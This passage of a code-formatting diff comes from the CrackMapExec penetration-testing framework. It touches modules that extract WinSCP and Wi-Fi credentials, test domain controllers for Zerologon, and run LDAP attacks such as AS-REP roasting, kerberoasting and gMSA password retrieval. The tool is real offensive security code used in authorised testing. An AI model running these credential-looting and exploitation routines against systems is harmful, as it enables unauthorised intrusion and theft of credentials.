rrp.hOpenUsers(remoteOps._RemoteOperations__rrp) regHandle = ans["phKey"] - ans = rrp.hBaseRegOpenKey( - remoteOps._RemoteOperations__rrp, regHandle, "" - ) + ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, "") keyHandle = ans["phkResult"] context.log.debug("LOAD USER INTO REGISTRY: " + userObject) @@ -324,9 +298,7 @@ class CMEModule: for userObject in unloadedUserObjects: context.log.debug("UNLOAD USER FROM REGISTRY: " + userObject) try: - rrp.hBaseRegUnLoadKey( - remoteOps._RemoteOperations__rrp, keyHandle, userObject - ) + rrp.hBaseRegUnLoadKey(remoteOps._RemoteOperations__rrp, keyHandle, userObject) except: traceback.print_exc() rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) @@ -344,14 +316,11 @@ class CMEModule: ans = rrp.hBaseRegOpenKey( remoteOps._RemoteOperations__rrp, regHandle, - userObject - + "\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security", + userObject + "\\Software\\Martin Prikryl\\WinSCP 2\\Configuration\\Security", ) keyHandle = ans["phkResult"] - useMasterPassword = rrp.hBaseRegQueryValue( - remoteOps._RemoteOperations__rrp, keyHandle, "UseMasterPassword" - )[1] + useMasterPassword = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "UseMasterPassword")[1] rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) finally: remoteOps.finish() @@ -369,9 +338,7 @@ class CMEModule: self.userObjectToNameMapper(context, connection, allUserObjects) # Users which must be loaded into registry: - unloadedUserObjects = list( - set(userObjects).symmetric_difference(set(allUserObjects)) - ) + unloadedUserObjects = list(set(userObjects).symmetric_difference(set(allUserObjects))) self.loadMissingUsers(context, connection, unloadedUserObjects) # Retrieve how many sessions are stored in registry from each UserObject @@ -386,24 +353,14 @@ class CMEModule: ) keyHandle = ans["phkResult"] - data = rrp.hBaseRegQueryInfoKey( - remoteOps._RemoteOperations__rrp, keyHandle - ) + data = rrp.hBaseRegQueryInfoKey(remoteOps._RemoteOperations__rrp, keyHandle) sessions = data["lpcSubKeys"] - context.log.success( - 'Found {} sessions for user "{}" in registry!'.format( - sessions - 1, self.userDict[userObject] - ) - ) + context.log.success('Found {} sessions for user "{}" in registry!'.format(sessions - 1, self.userDict[userObject])) # Get Session Names sessionNames = [] for i in range(sessions): - sessionNames.append( - rrp.hBaseRegEnumKey( - remoteOps._RemoteOperations__rrp, keyHandle, i - )["lpNameOut"].split("\x00")[:-1][0] - ) + sessionNames.append(rrp.hBaseRegEnumKey(remoteOps._RemoteOperations__rrp, keyHandle, i)["lpNameOut"].split("\x00")[:-1][0]) rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) sessionNames.remove("Default%20Settings") @@ -414,17 +371,11 @@ class CMEModule: for sessionName in sessionNames: self.printCreds( context, - self.registrySessionExtractor( - context, connection, userObject, sessionName - ), + self.registrySessionExtractor(context, connection, userObject, sessionName), ) except DCERPCException as e: if str(e).find("ERROR_FILE_NOT_FOUND"): - context.log.debug( - "No WinSCP config found in registry for user {}".format( - userObject - ) - ) + context.log.debug("No WinSCP config found in registry for user {}".format(userObject)) except Exception: context.log.fail("Unexpected error:") traceback.print_exc() @@ -432,9 +383,7 @@ class CMEModule: except DCERPCException as e: # Error during registry query if str(e).find("rpc_s_access_denied"): - context.log.fail( - "Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry." - ) + context.log.fail("Error: rpc_s_access_denied. Seems like you don't have enough privileges to read the registry.") except: context.log.fail("UNEXPECTED ERROR:") traceback.print_exc() @@ -475,17 +424,11 @@ class CMEModule: context.log.success("Found config file! Extracting credentials...") self.decodeConfigFile(context, confFile) except: - context.log.fail( - "Error! No config file found at {}".format(self.filepath) - ) + context.log.fail("Error! No config file found at {}".format(self.filepath)) traceback.print_exc() else: - context.log.display( - "Looking for WinSCP creds in User documents and AppData..." - ) - output = connection.execute( - 'powershell.exe "Get-LocalUser | Select name"', True - ) + context.log.display("Looking for WinSCP creds in User documents and AppData...") + output = connection.execute('powershell.exe "Get-LocalUser | Select name"', True) users = [] for row in output.split("\r\n"): users.append(row.strip()) @@ -503,15 +446,9 @@ class CMEModule: buf = BytesIO() connection.conn.getFile(self.share, path, buf.write) confFile = buf.getvalue().decode() - context.log.success( - 'Found config file at "{}"! Extracting credentials...'.format( - self.share + path - ) - ) + context.log.success('Found config file at "{}"! Extracting credentials...'.format(self.share + path)) except: - context.log.debug( - 'No config file found at "{}"'.format(self.share + path) - ) + context.log.debug('No config file found at "{}"'.format(self.share + path)) if confFile: self.decodeConfigFile(context, confFile) diff --git a/cme/modules/wireless.py b/cme/modules/wireless.py index 290787d3..088d00d0 100644 --- a/cme/modules/wireless.py +++ b/cme/modules/wireless.py @@ -63,11 +63,7 @@ class CMEModule: context.log.fail("No masterkeys looted") return - context.log.success( - "Got {} decrypted masterkeys. Looting Wifi interfaces".format( - highlight(len(masterkeys)) - ) - ) + context.log.success("Got {} decrypted masterkeys. Looting Wifi interfaces".format(highlight(len(masterkeys)))) try: # Collect Chrome Based Browser stored secrets @@ -89,11 +85,6 @@ class CMEModule: ) ) except: - context.log.highlight( - "[%s] %s - Passphrase: %s" - % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password) - ) + context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password)) else: - context.log.highlight( - "[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type) - ) + context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type)) diff --git a/cme/modules/zerologon.py b/cme/modules/zerologon.py index 12e23ab9..527f8f05 100644 --- a/cme/modules/zerologon.py +++ b/cme/modules/zerologon.py @@ -14,9 +14,7 @@ MAX_ATTEMPTS = 2000 # False negative chance: 0.04% class CMEModule: name = "zerologon" - description = ( - "Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472" - ) + description = "Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = False @@ -30,13 +28,9 @@ class CMEModule: def on_login(self, context, connection): self.context = context - if self.perform_attack( - "\\\\" + connection.hostname, connection.host, connection.hostname - ): + if self.perform_attack("\\\\" + connection.hostname, connection.host, connection.hostname): self.context.log.highlight("VULNERABLE") - self.context.log.highlight( - "Next step: https://github.com/dirkjanm/CVE-2020-1472" - ) + self.context.log.highlight("Next step: https://github.com/dirkjanm/CVE-2020-1472") try: host = self.context.db.get_hosts(connection.host)[0] self.context.db.add_host( @@ -61,18 +55,13 @@ class CMEModule: rpc_con.connect() rpc_con.bind(nrpc.MSRPC_UUID_NRPC) for attempt in range(0, MAX_ATTEMPTS): - result = try_zero_authenticate( - rpc_con, dc_handle, dc_ip, target_computer - ) + result = try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer) if result: return True else: self.context.log.debug("\nAttack failed. Target is probably patched.") except DCERPCException as e: - self.context.log.fail( - f"Error while connecting to host: DCERPCException, " - f"which means this is probably not a DC!" - ) + self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!") def fail(msg): @@ -95,9 +84,7 @@ def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer): flags = 0x212FFFFF # Send challenge and authentication request. - nrpc.hNetrServerReqChallenge( - rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext - ) + nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", target_computer + "\x00", plaintext) try: server_auth = nrpc.hNetrServerAuthenticate3( rpc_con, diff --git a/cme/parsers/ip.py b/cme/parsers/ip.py index 48ed14e9..9a1371e9 100755 --- a/cme/parsers/ip.py +++ b/cme/parsers/ip.py @@ -19,10 +19,7 @@ def parse_targets(target): for ip in ip_range: yield str(ip) else: - if ( - ip_interface(target).ip.version == 6 - and ip_address(target).is_link_local - ): + if ip_interface(target).ip.version == 6 and ip_address(target).is_link_local: yield str(target) else: for ip in ip_network(target, strict=False): diff --git a/cme/parsers/nmap.py b/cme/parsers/nmap.py index 178a41d8..b7abb033 100644 --- a/cme/parsers/nmap.py +++ b/cme/parsers/nmap.py @@ -29,9 +29,7 @@ def parse_nmap_xml(nmap_output_file, protocol): ip = host["address"][0]["@addr"] for port in host["ports"]["port"]: if port["state"]["@state"] == "open": - if "service" in port and ( - port["service"]["@name"] in protocol_dict[protocol]["services"] - ): + if "service" in port and (port["service"]["@name"] in protocol_dict[protocol]["services"]): if ip not in targets: targets.append(ip) elif port["@portid"] in protocol_dict[protocol]["ports"]: diff --git a/cme/paths.py b/cme/paths.py index 23d17dd0..0642994b 100644 --- a/cme/paths.py +++ b/cme/paths.py @@ -7,9 +7,7 @@ TMP_PATH = os.path.join("/tmp", "cme_hosted") if os.name == "nt": TMP_PATH = os.getenv("LOCALAPPDATA") + "\\Temp\\cme_hosted" if hasattr(sys, "getandroidapilevel"): - TMP_PATH = os.path.join( - "/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted" - ) + TMP_PATH = os.path.join("/data", "data", "com.termux", "files", "usr", "tmp", "cme_hosted") WS_PATH = os.path.join(CME_PATH, "workspaces") CERT_PATH = os.path.join(CME_PATH, "cme.pem") CONFIG_PATH = os.path.join(CME_PATH, "cme.conf") diff --git a/cme/protocols/ftp.py b/cme/protocols/ftp.py index 9cfd8bc2..9ff36dbf 100644 --- a/cme/protocols/ftp.py +++ b/cme/protocols/ftp.py @@ -9,17 +9,13 @@ from ftplib import FTP, error_reply, error_temp, error_perm, error_proto class ftp(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ftp_parser = parser.add_parser( - "ftp", help="own stuff using FTP", parents=[std_parser, module_parser] - ) + ftp_parser = parser.add_parser("ftp", help="own stuff using FTP", parents=[std_parser, module_parser]) ftp_parser.add_argument( "--no-bruteforce", action="store_true", help="No spray when using file for username and password (user1 => password1, user2 => password2", ) - ftp_parser.add_argument( - "--port", type=int, default=21, help="FTP port (default: 21)" - ) + ftp_parser.add_argument("--port", type=int, default=21, help="FTP port (default: 21)") ftp_parser.add_argument( "--continue-on-success", action="store_true", diff --git a/cme/protocols/ftp/database.py b/cme/protocols/ftp/database.py index cacb6666..abd8cf3c 100644 --- a/cme/protocols/ftp/database.py +++ b/cme/protocols/ftp/database.py @@ -47,19 +47,10 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.CredentialsTable = Table( - "credentials", self.metadata, autoload_with=self.db_engine - ) - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/ftp/db_navigator.py b/cme/protocols/ftp/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/ftp/db_navigator.py +++ b/cme/protocols/ftp/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/ldap.py b/cme/protocols/ldap.py index 18b2ab15..4cd20007 100644 --- a/cme/protocols/ldap.py +++ b/cme/protocols/ldap.py @@ -139,9 +139,7 @@ def get_conditional_action(baseAction): def __call__(self, parser, namespace, values, option_string=None): for x in self.make_required: x.required = True - super(ConditionalAction, self).__call__( - parser, namespace, values, option_string - ) + super(ConditionalAction, self).__call__(parser, namespace, values, option_string) return ConditionalAction @@ -171,9 +169,7 @@ class ldap(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - ldap_parser = parser.add_parser( - "ldap", help="own stuff using LDAP", parents=[std_parser, module_parser] - ) + ldap_parser = parser.add_parser("ldap", help="own stuff using LDAP", parents=[std_parser, module_parser]) ldap_parser.add_argument( "-H", "--hash", @@ -223,15 +219,9 @@ class ldap(connection): ) no_smb_arg.make_required = [domain_arg] - egroup = ldap_parser.add_argument_group( - "Retrevie hash on the remote DC", "Options to get hashes from Kerberos" - ) - egroup.add_argument( - "--asreproast", help="Get AS_REP response ready to crack with hashcat" - ) - egroup.add_argument( - "--kerberoasting", help="Get TGS ticket ready to crack with hashcat" - ) + egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos") + egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat") + egroup.add_argument("--kerberoasting", help="Get TGS ticket ready to crack with hashcat") vgroup = ldap_parser.add_argument_group( "Retrieve useful information on the domain", @@ -252,34 +242,20 @@ class ldap(connection): action="store_true", help="Get objets that had the value adminCount=1", ) - vgroup.add_argument( - "--users", action="store_true", help="Enumerate enabled domain users" - ) - vgroup.add_argument( - "--groups", action="store_true", help="Enumerate domain groups" - ) + vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users") + vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups") vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid") - ggroup = ldap_parser.add_argument_group( - "Retrevie gmsa on the remote DC", "Options to play with gmsa" - ) - ggroup.add_argument( - "--gmsa", action="store_true", help="Enumerate GMSA passwords" - ) + ggroup = ldap_parser.add_argument_group("Retrevie gmsa on the remote DC", "Options to play with gmsa") + ggroup.add_argument("--gmsa", action="store_true", help="Enumerate GMSA passwords") ggroup.add_argument( "--gmsa-convert-id", help="Get the secret name of specific gmsa or all gmsa if no gmsa provided", ) - ggroup.add_argument( - "--gmsa-decrypt-lsa", help="Decrypt the gmsa encrypted value from LSA" - ) + ggroup.add_argument("--gmsa-decrypt-lsa", help="Decrypt the gmsa encrypted value from LSA") - bgroup = ldap_parser.add_argument_group( - "Bloodhound scan", "Options to play with bloodhoud" - ) - bgroup.add_argument( - "--bloodhound", action="store_true", help="Perform bloodhound scan" - ) + bgroup = ldap_parser.add_argument_group("Bloodhound scan", "Options to play with bloodhoud") + bgroup.add_argument("--bloodhound", action="store_true", help="Perform bloodhound scan") bgroup.add_argument("-ns", "--nameserver", help="Custom DNS IP") bgroup.add_argument( "-c", @@ -313,9 +289,7 @@ class ldap(connection): if proto == "ldaps": self.logger.debug(f"LDAPs connection to {ldap_url} failed - {e}") # https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority - self.logger.debug( - f"Even if the port is open, LDAPS may not be configured" - ) + self.logger.debug(f"Even if the port is open, LDAPS may not be configured") else: self.logger.debug(f"LDAP connection to {ldap_url} failed: {e}") return [None, None, None] @@ -348,9 +322,7 @@ class ldap(connection): self.logger.info(f"Skipping item, cannot process due to error {e}") except OSError as e: return [None, None, None] - self.logger.debug( - f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}" - ) + self.logger.debug(f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}") return [target, target_domain, base_dn] def get_os_arch(self): @@ -389,9 +361,7 @@ class ldap(connection): if search_result["resultCode"] == ldapasn1_impacket.ResultCode("success"): response_value = search_result["responseValue"] if response_value.hasValue(): - value = response_value.asOctets().decode(response_value.encoding)[ - 2: - ] + value = response_value.asOctets().decode(response_value.encoding)[2:] return value.split("\\")[1] return "" @@ -417,11 +387,7 @@ class ldap(connection): self.domain = self.conn.getServerDNSDomainName() self.hostname = self.conn.getServerName() self.server_os = self.conn.getServerOS() - self.signing = ( - self.conn.isSigningRequired() - if self.smbv1 - else self.conn._SMBConnection._Connection["RequireSigning"] - ) + self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection["RequireSigning"] self.os_arch = self.get_os_arch() if not self.domain: @@ -440,9 +406,7 @@ class ldap(connection): # Re-connect since we logged off self.create_conn_obj() - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") def print_host_info(self): @@ -455,9 +419,7 @@ class ldap(connection): else: self.logger.extra["protocol"] = "SMB" if not self.no_ntlm else "LDAP" self.logger.extra["port"] = "445" if not self.no_ntlm else "389" - self.logger.display( - f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})" - ) + self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) (signing:{self.signing}) (SMBv1:{self.smbv1})") self.logger.extra["protocol"] = "LDAP" # self.logger.display(self.endpoint) return True @@ -529,17 +491,13 @@ class ldap(connection): self.check_if_admin() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" out = f"{domain}\\{self.username}{used_ccache} {self.mark_pwned()}" # out = f"{domain}\\{self.username}{' from ccache' if useCache else ':%s' % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8)} {highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -555,9 +513,7 @@ class ldap(connection): return False except SessionError as e: error, desc = e.getErrorString() - used_ccache = ( - " from ccache" if useCache else f":{process_secret(kerb_pass)}" - ) + used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}" self.logger.fail( f"{self.domain}\\{self.username}{used_ccache} {str(error)}", color="magenta" if error in ldap_error_status else "red", @@ -576,9 +532,7 @@ class ldap(connection): # Connect to LDAPS ldaps_url = f"ldaps://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [2]") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.kerberosLogin( username, password, @@ -603,9 +557,7 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: @@ -649,18 +601,14 @@ class ldap(connection): ldap_url = f"{proto}://{self.target}" self.logger.debug(f"Connecting to {ldap_url} - {self.baseDN} [3]") self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN) - self.ldapConnection.login( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.check_if_admin() # Prepare success credential text out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -674,9 +622,7 @@ class ldap(connection): # Connect to LDAPS ldaps_url = f"{proto}://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN} [4]") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.login( self.username, self.password, @@ -693,32 +639,24 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) else: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) return False except OSError as e: - self.logger.fail( - f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}") return False def hash_login(self, domain, username, ntlm_hash): @@ -756,17 +694,13 @@ class ldap(connection): ldaps_url = f"{proto}://{self.target}" self.logger.info(f"Connecting to {ldaps_url} - {self.baseDN}") self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) - self.ldapConnection.login( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.check_if_admin() # Prepare success credential text out = f"{domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}" self.logger.extra["protocol"] = "LDAP" - self.logger.extra["port"] = ( - "636" if (self.args.gmsa or self.args.port == 636) else "389" - ) + self.logger.extra["port"] = "636" if (self.args.gmsa or self.args.port == 636) else "389" self.logger.success(out) if not self.args.local_auth: @@ -779,9 +713,7 @@ class ldap(connection): # We need to try SSL ldaps_url = f"{proto}://{self.target}" self.logger.debug(f"Connecting to {ldaps_url} - {self.baseDN}") - self.ldapConnection = ldap_impacket.LDAPConnection( - ldaps_url, self.baseDN - ) + self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN) self.ldapConnection.login( self.username, self.password, @@ -798,40 +730,30 @@ class ldap(connection): self.logger.success(out) if not self.args.local_auth: - add_user_bh( - self.username, self.domain, self.logger, self.config - ) + add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) else: error_code = str(e).split()[-2][:-1] self.logger.fail( f"{self.domain}\\{self.username}:{nthash if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {ldap_error_status[error_code] if error_code in ldap_error_status else ''}", - color="magenta" - if (error_code in ldap_error_status and error_code != 1) - else "red", + color="magenta" if (error_code in ldap_error_status and error_code != 1) else "red", ) return False except OSError as e: - self.logger.fail( - f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{self.password if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode') * 8} {'Error connecting to the domain, are you sure LDAP service is running on the target?'} \nError: {e}") return False def create_smbv1_conn(self): self.logger.debug(f"Creating smbv1 connection object") try: - self.conn = SMBConnection( - self.host, self.host, None, 445, preferredDialect=SMB_DIALECT - ) + self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT) self.smbv1 = True if self.conn: self.logger.debug(f"SMBv1 Connection successful") @@ -885,19 +807,8 @@ class ldap(connection): identifier_authority = hex(identifier_authority) # loop over the count of small endians - sub_authority = "-" + "-".join( - [ - str( - int.from_bytes( - sid[8 + (i * 4) : 12 + (i * 4)], byteorder="little" - ) - ) - for i in range(sub_authorities) - ] - ) - object_sid = ( - "S-" + str(revision) + "-" + str(identifier_authority) + sub_authority - ) + sub_authority = "-" + "-".join([str(int.from_bytes(sid[8 + (i * 4) : 12 + (i * 4)], byteorder="little")) for i in range(sub_authorities)]) + object_sid = "S-" + str(revision) + "-" + str(identifier_authority) + sub_authority return object_sid except Exception: pass @@ -916,15 +827,7 @@ class ldap(connection): self.sid_domain = "-".join(sid.split("-")[:-1]) # 2. get all group cn name - search_filter = ( - "(|(objectSid=" - + self.sid_domain - + "-512)(objectSid=" - + self.sid_domain - + "-544)(objectSid=" - + self.sid_domain - + "-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))" - ) + search_filter = "(|(objectSid=" + self.sid_domain + "-512)(objectSid=" + self.sid_domain + "-544)(objectSid=" + self.sid_domain + "-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))" attributes = ["distinguishedName"] resp = self.search(search_filter, attributes, sizeLimit=0) answers = [] @@ -933,22 +836,10 @@ class ldap(connection): continue for attribute in item["attributes"]: if str(attribute["type"]) == "distinguishedName": - answers.append( - str( - "(memberOf:1.2.840.113556.1.4.1941:=" - + attribute["vals"][0] - + ")" - ) - ) + answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute["vals"][0] + ")")) # 3. get member of these groups - search_filter = ( - "(&(objectCategory=user)(sAMAccountName=" - + self.username - + ")(|" - + "".join(answers) - + "))" - ) + search_filter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + "".join(answers) + "))" attributes = [""] resp = self.search(search_filter, attributes, sizeLimit=0) answers = [] @@ -975,9 +866,7 @@ class ldap(connection): return resp except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - self.logger.fail( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + self.logger.fail("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -1049,11 +938,7 @@ class ldap(connection): if self.password == "" and self.nthash == "" and self.kerberos is False: return False # Building the search filter - search_filter = ( - "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" - "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" - % (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE) - ) + search_filter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE) attributes = [ "sAMAccountName", "pwdLastSet", @@ -1090,20 +975,12 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) elif str(attribute["type"]) == "lastLogon": if str(attribute["vals"][0]) == "0": lastLogon = "" else: - lastLogon = str( - datetime.fromtimestamp( - self.getUnixTime(int(str(attribute["vals"][0]))) - ) - ) + lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute["vals"][0]))))) if mustCommit is True: answers.append( [ @@ -1133,10 +1010,7 @@ class ldap(connection): def kerberoasting(self): # Building the search filter - searchFilter = ( - "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" - "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))" - ) + searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))" attributes = [ "servicePrincipalName", "sAMAccountName", @@ -1171,10 +1045,7 @@ class ldap(connection): userAccountControl = str(attribute["vals"][0]) if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION: delegation = "unconstrained" - elif ( - int(userAccountControl) - & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - ): + elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: delegation = "constrained" elif str(attribute["type"]) == "memberOf": memberOf = str(attribute["vals"][0]) @@ -1182,29 +1053,19 @@ class ldap(connection): if str(attribute["vals"][0]) == "0": pwdLastSet = "" else: - pwdLastSet = str( - datetime.fromtimestamp( - 